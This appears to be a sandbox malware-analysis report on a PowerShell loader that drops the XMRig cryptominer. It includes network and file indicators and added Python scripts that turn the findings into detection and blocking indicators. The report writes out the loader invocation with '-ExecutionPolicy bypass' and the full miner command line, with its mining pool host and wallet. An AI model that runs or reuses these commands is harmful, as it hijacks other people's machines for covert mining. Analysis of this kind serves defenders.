
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 34.197.79.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/1468-3-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-5-0x000001AA39790000-0x000001AA397B2000-memory.dmp

memory/1468-9-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-8-0x000001AA39840000-0x000001AA398B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h4fu5irm.yyc.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1468-18-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-25-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-29-0x00007FFA60383000-0x00007FFA60384000-memory.dmp

memory/1468-30-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp

memory/1468-63-0x000001AA39BC0000-0x000001AA39BCA000-memory.dmp

memory/1468-50-0x000001AA39BE0000-0x000001AA39BF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3576-92-0x000001CEEAC40000-0x000001CEEAC60000-memory.dmp

memory/3576-93-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-94-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-95-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-96-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-97-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-98-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-99-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-100-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-101-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-102-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-103-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-104-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-105-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-106-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-107-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-108-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-109-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-110-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-111-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-112-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-113-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-114-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-115-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-116-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-117-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-118-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-119-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-120-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-121-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-122-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-123-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-124-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-125-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-126-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-127-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-128-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-129-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-130-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-131-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-132-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-133-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-134-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-135-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-136-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-137-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-138-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-139-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-140-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-141-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-142-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-143-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-144-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-145-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-146-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-147-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-148-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-149-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-150-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-151-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-152-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-153-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-154-0x00007FF647500000-0x00007FF648133000-memory.dmp

memory/3576-155-0x00007FF647500000-0x00007FF648133000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:47

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1781s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; every field exported as N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
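
The two command lines above carry everything a hunter needs from this run: the loader disables script policy with -ExecutionPolicy bypass and runs a .ps1 out of %TEMP%, and the miner's own flags name the pool, the coin, the wallet and the worker. The Python below is an added triage example, not part of the sandbox report or of XMRig; it parses both command lines (copied from the Processes section) into fields and turns them into findings. The split of the -u value into COIN:wallet.worker is inferred from the string shown on this page, not from pool documentation, and the tokenizer is a minimal Windows-style splitter written for this example.

```python
"""Parse the loader and miner command lines from this report into hunting
indicators. Added example; the two command lines are copied from the
Processes section, everything else is analyst code and assumptions."""
import re
from urllib.parse import urlsplit

# Copied verbatim from the Processes section of this run.
POWERSHELL_CMD = (
    'powershell.exe -ExecutionPolicy bypass -File '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\file01 - copia (8).ps1"'
)
XMRIG_CMD = (
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" '
    '-a rx -o stratum+ssl://rx.unmineable.com:443 '
    '-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'
    '.unmineable_worker_vilqtiac -p x'
)

# Double-quoted argument or bare run of non-whitespace. shlex is avoided on
# purpose: its POSIX escaping mangles backslashes in Windows paths.
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def split_windows_cmdline(cmd):
    """Whitespace split that keeps double-quoted arguments (paths with spaces) intact."""
    return [quoted if quoted else bare for quoted, bare in _TOKEN.findall(cmd)]


def _flag_values(tokens):
    """Map each '-flag' to the token that follows it (flags are case-insensitive)."""
    values = {}
    for i, tok in enumerate(tokens):
        if tok.startswith('-') and i + 1 < len(tokens):
            values[tok.lower()] = tokens[i + 1]
    return values


def parse_powershell_loader(cmd):
    tokens = split_windows_cmdline(cmd)
    flags = _flag_values(tokens)
    policy = flags.get('-executionpolicy', '').lower()
    return {
        'image': tokens[0],
        'execution_policy': policy or None,
        'script': flags.get('-file'),
        # Bypass/Unrestricted disable the script signing check entirely.
        'bypasses_policy': policy in ('bypass', 'unrestricted'),
    }


def parse_xmrig_cmdline(cmd):
    tokens = split_windows_cmdline(cmd)
    flags = _flag_values(tokens)
    pool = urlsplit(flags.get('-o', ''))          # scheme://host:port
    user = flags.get('-u', '')
    # Assumed layout, as seen on this page: COIN:walletaddress.workername
    coin, _, rest = user.partition(':')
    wallet, _, worker = rest.partition('.')
    return {
        'image': tokens[0],
        'algo': flags.get('-a'),
        'pool_scheme': pool.scheme,
        'pool_host': pool.hostname,
        'pool_port': pool.port,
        'coin': coin or None,
        'wallet': wallet or None,
        'worker': worker or None,
        'password': flags.get('-p'),
    }


def miner_indicators(loader, miner):
    """Findings an analyst would record from the two parsed command lines."""
    findings = {}
    if loader['bypasses_policy']:
        findings['execution_policy_bypass'] = loader['script']
    if miner['pool_scheme'].startswith('stratum'):
        findings['stratum_pool'] = f"{miner['pool_host']}:{miner['pool_port']}"
    if miner['pool_port'] == 443:
        # TLS on 443 blends with web traffic: match the pool hostname/SNI, not the port.
        findings['pool_on_https_port'] = miner['pool_host']
    if miner['algo'] == 'rx':
        # RandomX needs large pages; that is why xmrig.exe requests
        # SeLockMemoryPrivilege in the AdjustPrivilegeToken signature above.
        findings['randomx_algo'] = 'large-page request (SeLockMemoryPrivilege) expected'
    if miner['wallet']:
        findings['wallet'] = miner['wallet']
    return findings


if __name__ == '__main__':
    loader = parse_powershell_loader(POWERSHELL_CMD)
    miner = parse_xmrig_cmdline(XMRIG_CMD)
    for key, value in miner_indicators(loader, miner).items():
        print(f'{key}: {value}')
```

The wallet address and worker name are the most durable pivots across the runs on this page: every detonation uses the same -u value, so a search for the wallet string in process command-line telemetry links all of them regardless of which copy of the .ps1 was executed.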

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
NL 23.62.61.154:443 www.bing.com tcp
US 8.8.8.8:53 154.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.154:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp
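
Most rows in the Network table above are sandbox background: reverse (in-addr.arpa) lookups issued by the analysis host and Bing traffic from the Windows image. Only two stages matter, the fetch from github.com / objects.githubusercontent.com that precedes the appearance of xmrig-6.21.3\xmrig.exe, and the TLS session to rx.unmineable.com:443 that matches the miner's -o argument. The Python below is an added triage example, not part of the report; ROWS is a subset of the table above, while the benign-suffix baseline and the labelling of the GitHub hosts as the payload stage are analyst assumptions.

```python
"""Sort the report's Network rows into payload retrieval, pool traffic and
sandbox noise, then emit the entries that are actually worth blocking.
Added example; ROWS is copied from the first Network table on this page."""

# Subset of the Network table: (country, destination, domain, proto).
ROWS = [
    ('US', '8.8.8.8:53', 'github.com', 'udp'),
    ('GB', '20.26.156.215:443', 'github.com', 'tcp'),
    ('US', '8.8.8.8:53', 'g.bing.com', 'udp'),
    ('US', '204.79.197.237:443', 'g.bing.com', 'tcp'),
    ('US', '8.8.8.8:53', '58.55.71.13.in-addr.arpa', 'udp'),
    ('US', '8.8.8.8:53', 'objects.githubusercontent.com', 'udp'),
    ('US', '185.199.108.133:443', 'objects.githubusercontent.com', 'tcp'),
    ('NL', '23.62.61.154:443', 'www.bing.com', 'tcp'),
    ('US', '8.8.8.8:53', 'rx.unmineable.com', 'udp'),
    ('GB', '161.35.34.195:443', 'rx.unmineable.com', 'tcp'),
    ('IE', '52.111.236.23:443', '', 'tcp'),   # no hostname in the report
]

# Assumption: Windows background traffic of the sandbox image, not sample activity.
SANDBOX_BASELINE = ('.bing.com', '.bing.net')
# Assumption: the hosts contacted before xmrig-6.21.3\xmrig.exe appears on disk.
PAYLOAD_HOSTS = {'github.com', 'objects.githubusercontent.com'}
# From the miner's -o argument in the Processes section.
POOL_HOSTS = {'rx.unmineable.com'}


def classify(row):
    """Return (kind, layer): kind in payload/pool/noise/unresolved/unknown,
    layer 'dns' for resolver queries or 'connection' for the real session."""
    _country, dest, domain, proto = row
    _ip, _, port = dest.rpartition(':')
    if domain.endswith('.in-addr.arpa'):
        return 'noise', 'dns'               # analysis host reverse lookups
    if not domain:
        return 'unresolved', 'connection'
    if domain in POOL_HOSTS:
        kind = 'pool'
    elif domain in PAYLOAD_HOSTS:
        kind = 'payload'
    elif domain.endswith(SANDBOX_BASELINE):
        kind = 'noise'
    else:
        kind = 'unknown'
    layer = 'dns' if port == '53' and proto == 'udp' else 'connection'
    return kind, layer


def summarize(rows):
    out = {'payload': {'domains': set(), 'ips': set()},
           'pool': {'domains': set(), 'ips': set()},
           'noise': 0, 'unresolved': [], 'unknown': []}
    for row in rows:
        kind, layer = classify(row)
        _, dest, domain, _ = row
        if kind in ('payload', 'pool'):
            out[kind]['domains'].add(domain)
            if layer == 'connection':       # the resolver IP is not an indicator
                out[kind]['ips'].add(dest.rpartition(':')[0])
        elif kind == 'noise':
            out['noise'] += 1
        elif kind == 'unresolved':
            out['unresolved'].append(dest)
        else:
            out['unknown'].append(domain)
    return out


def blocklist(rows):
    """Only the pool is safe to deny outright. The payload stage rode on
    GitHub, which most environments cannot block by hostname; hunt it with
    the dropped file's SHA256 from the Files section instead."""
    s = summarize(rows)
    return sorted(s['pool']['domains'] | s['pool']['ips'])


if __name__ == '__main__':
    print(summarize(ROWS))
    print('block:', blocklist(ROWS))
```

Because the pool session is TLS on 443, a proxy or egress filter needs the hostname (DNS query or TLS SNI) rather than the port to catch it; the 8.8.8.8 resolver rows show exactly which name to alert on.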

Files

memory/2968-0-0x00007FFB9F983000-0x00007FFB9F985000-memory.dmp

memory/2968-1-0x0000024A58B60000-0x0000024A58B82000-memory.dmp

memory/2968-2-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jnq0vgz4.l2s.ps1
(PowerShell's own AppLocker/WDAC lockdown probe, written to %TEMP% at every PowerShell start; not a file dropped by the sample)

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2968-12-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/2968-14-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/2968-15-0x0000024A59040000-0x0000024A59052000-memory.dmp

memory/2968-16-0x0000024A59020000-0x0000024A5902A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3388-47-0x000002090EB70000-0x000002090EB90000-memory.dmp

memory/3388-48-0x0000020910580000-0x00000209105A0000-memory.dmp

memory/3388-49-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/2968-50-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/2968-51-0x00007FFB9F983000-0x00007FFB9F985000-memory.dmp

memory/3388-54-0x00000209105C0000-0x00000209105E0000-memory.dmp

memory/3388-53-0x00000209105A0000-0x00000209105C0000-memory.dmp

memory/3388-52-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/2968-55-0x00007FFB9F980000-0x00007FFBA0441000-memory.dmp

memory/3388-56-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-57-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-58-0x00000209105A0000-0x00000209105C0000-memory.dmp

memory/3388-59-0x00000209105C0000-0x00000209105E0000-memory.dmp

memory/3388-60-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-61-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-62-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-63-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-64-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-65-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-66-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-67-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-68-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-69-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-70-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-71-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-72-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-73-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-74-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-75-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-76-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-77-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-78-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-79-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-80-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-81-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-82-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-83-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-84-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-85-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-86-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-87-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-88-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-89-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-90-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-91-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-92-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-93-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-94-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-95-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-96-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-97-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-98-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-99-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-100-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-101-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-102-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-103-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-104-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-105-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-106-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-107-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-108-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-109-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-110-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-111-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-112-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-113-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-114-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-115-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-116-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-117-0x00007FF606920000-0x00007FF607553000-memory.dmp

memory/3388-118-0x00007FF606920000-0x00007FF607553000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win11-20240508-en

Max time kernel

1795s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/2496-0-0x00007FF8262D3000-0x00007FF8262D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lx2wutqz.mm3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2496-9-0x000002147D980000-0x000002147D9A2000-memory.dmp

memory/2496-10-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/2496-11-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/2496-12-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/2496-13-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/2496-14-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/2496-15-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/2496-17-0x000002147E0E0000-0x000002147E0F2000-memory.dmp

memory/2496-18-0x000002147DE10000-0x000002147DE1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4536-49-0x000001949F690000-0x000001949F6B0000-memory.dmp

memory/4536-50-0x00000194A0E90000-0x00000194A0EB0000-memory.dmp

memory/4536-51-0x00007FF720FB0000-0x00007FF721BE3000-memory.dmp

